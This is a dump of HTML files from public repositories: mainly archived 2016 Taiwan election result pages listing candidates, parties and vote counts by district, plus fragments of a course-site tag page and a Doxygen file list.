2017/09/12 </span> </article> <article class="archive-item"> <a href="/2017/09/10/stor-831-course-description/" class="archive-item-link">STOR 831 Course description</a> <span class="archive-item-date"> 2017/09/10 </span> </article> </div> </main> <footer class="footer"> <ul class="footer-links"> <li> <a href="/index.xml" type="application/rss+xml" target="_blank">RSS feed</a> </li> <li> <a href="https://gohugo.io/" class="footer-links-kudos">Made with <img src="/images/hugo-logo.png" width="22" height="22"></a> </li> </ul> </footer> </div> </body> </html>
shankar-bhamidi/831_course_site
public/tags/fall-2017/index.html
HTML
cc0-1.0
2,091
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeT.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_2.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le main-le-current" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>區域立法委員選舉&nbsp;新北市&nbsp;第3選舉區&nbsp;候選人得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;候選人數:9&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;應選人數:1&nbsp;&nbsp; <!--<img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp; <img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;應有婦女當選名額:0--> </td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td>姓名</td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>推薦之政黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>陳長發</td> <td>男</td> <td class="tdAlignRight">655</td> <td class="tdAlignRight">0.3700</td> <td>大愛憲改聯盟</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蕭忠漢</td> <td>男</td> <td class="tdAlignRight">546</td> <td class="tdAlignRight">0.3084</td> <td>健保免費連線</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>李乾龍</td> <td>男</td> <td class="tdAlignRight">62,723</td> <td class="tdAlignRight">35.4311</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>◎</td> <td>4</td> <td>高志鵬</td> <td>男</td> <td class="tdAlignRight">96,557</td> <td class="tdAlignRight">54.5433</td> <td>民主進步黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>5</td> <td>張碩文</td> <td>男</td> <td class="tdAlignRight">13,375</td> <td class="tdAlignRight">7.5553</td> <td>親民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>6</td> <td>林其瑩</td> <td>男</td> <td class="tdAlignRight">1,114</td> <td class="tdAlignRight">0.6293</td> <td>社會福利黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>7</td> <td>姚胤宏</td> <td>男</td> <td class="tdAlignRight">1,314</td> <td class="tdAlignRight">0.7423</td> <td>樹黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>8</td> <td>黃茂</td> <td>男</td> <td class="tdAlignRight">315</td> <td class="tdAlignRight">0.1779</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>9</td> <td>蘇卿彥</td> <td>男</td> <td class="tdAlignRight">429</td> <td class="tdAlignRight">0.2423</td> <td>無</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;195/195&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>當選註記</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 21:30:10 +0800" title="Sat, 16 Jan 2016 21:30:10 +0800">&nbsp;資料更新時間:01/16&nbsp;21:30:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter">[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/NWT-3/n200030000000000/20160116133222/page.html
HTML
cc0-1.0
8,407
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeT.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_2.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le main-le-current" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>區域立法委員選舉&nbsp;臺中市&nbsp;第2選舉區&nbsp;候選人得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;候選人數:4&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;應選人數:1&nbsp;&nbsp; <!--<img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp; <img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;應有婦女當選名額:0--> </td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td>姓名</td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>推薦之政黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>陳世凱</td> <td>男</td> <td class="tdAlignRight">87,596</td> <td class="tdAlignRight">43.7108</td> <td>民主進步黨</td> </tr> <tr class="trT"> <td>◎</td> <td>2</td> <td>顏寬恒</td> <td>男</td> <td class="tdAlignRight">93,495</td> <td class="tdAlignRight">46.6544</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>鍾文龍</td> <td>男</td> <td class="tdAlignRight">1,370</td> <td class="tdAlignRight">0.6836</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>4</td> <td>紀國棟</td> <td>男</td> <td class="tdAlignRight">17,938</td> <td class="tdAlignRight">8.9511</td> <td>無</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;216/216&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>當選註記</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 22:27:11 +0800" title="Sat, 16 Jan 2016 22:27:11 +0800">&nbsp;資料更新時間:01/16&nbsp;22:27:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter">[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/TXG-2/n400020000000000/20160116143015/page.html
HTML
cc0-1.0
6,937
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 嘉義市 西區得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">8,667</td> <td class="tdAlignRight">25.9654</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">20,697</td> <td class="tdAlignRight">62.0061</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">4,015</td> <td class="tdAlignRight">12.0285</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;48/96&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 19:00:12 +0800" title="Sat, 16 Jan 2016 19:00:12 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;19:00:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/president/n714000200000000/20160116110234/page.html
HTML
cc0-1.0
6,575
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 苗栗縣 銅鑼鄉得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">4,407</td> <td class="tdAlignRight">45.4705</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">3,647</td> <td class="tdAlignRight">37.6290</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">1,638</td> <td class="tdAlignRight">16.9005</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;16/16&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 19:15:12 +0800" title="Sat, 16 Jan 2016 19:15:12 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;19:15:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/president/n702000600000000/20160116111607/page.html
HTML
cc0-1.0
6,577
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeT.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_2.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le main-le-current" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>區域立法委員選舉&nbsp;臺北市&nbsp;第6選舉區&nbsp;候選人得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;<img src="../images/nav.gif" alt="候選人數" title="候選人數">&nbsp;候選人數:12&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;<img src="../images/nav.gif" alt="應選人數" title="應選人數">&nbsp;應選人數:1&nbsp;&nbsp; <!--<img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp; <img src="../images/nav.gif" alt="應有婦女當選名額" title="應有婦女當選名額">&nbsp;應有婦女當選名額:0--> </td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td>姓名</td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>推薦之政黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>陳家宏</td> <td>男</td> <td class="tdAlignRight">1,986</td> <td class="tdAlignRight">1.2369</td> <td>樹黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>范雲</td> <td>女</td> <td class="tdAlignRight">56,766</td> <td class="tdAlignRight">35.3550</td> <td>綠黨社會民主黨聯盟</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>龎維良</td> <td>男</td> <td class="tdAlignRight">2,963</td> <td class="tdAlignRight">1.8454</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>4</td> <td>趙衍慶</td> <td>男</td> <td class="tdAlignRight">3,212</td> <td class="tdAlignRight">2.0005</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>5</td> <td>林珍妤</td> <td>女</td> <td class="tdAlignRight">1,328</td> <td class="tdAlignRight">0.8271</td> <td>台灣獨立黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>6</td> <td>周芳如</td> <td>女</td> <td class="tdAlignRight">4,120</td> <td class="tdAlignRight">2.5660</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>7</td> <td>蔣慰慈</td> <td>女</td> <td class="tdAlignRight">271</td> <td class="tdAlignRight">0.1688</td> <td>無</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>8</td> <td>鄭村棋</td> <td>男</td> <td class="tdAlignRight">4,927</td> <td class="tdAlignRight">3.0686</td> <td>人民民主陣線</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>9</td> <td>曾獻瑩</td> <td>男</td> <td class="tdAlignRight">4,826</td> <td class="tdAlignRight">3.0057</td> <td>信心希望聯盟</td> </tr> <tr class="trT"> <td>◎</td> <td>10</td> <td>蔣乃辛</td> <td>男</td> <td class="tdAlignRight">74,015</td> <td class="tdAlignRight">46.0980</td> <td>中國國民黨</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>11</td> <td>古文發</td> <td>男</td> <td class="tdAlignRight">184</td> <td class="tdAlignRight">0.1146</td> <td>大愛憲改聯盟</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>12</td> <td>吳旭智</td> <td>男</td> <td class="tdAlignRight">5,962</td> <td class="tdAlignRight">3.7133</td> <td>民國黨</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;188/188&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>當選註記</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 22:54:10 +0800" title="Sat, 16 Jan 2016 22:54:10 +0800">&nbsp;資料更新時間:01/16&nbsp;22:54:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter">[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/TPE-6/n100060000000000/20160116145442/page.html
HTML
cc0-1.0
9,299
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.6"/> <title>My Project: File List</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">My Project </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.6 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a 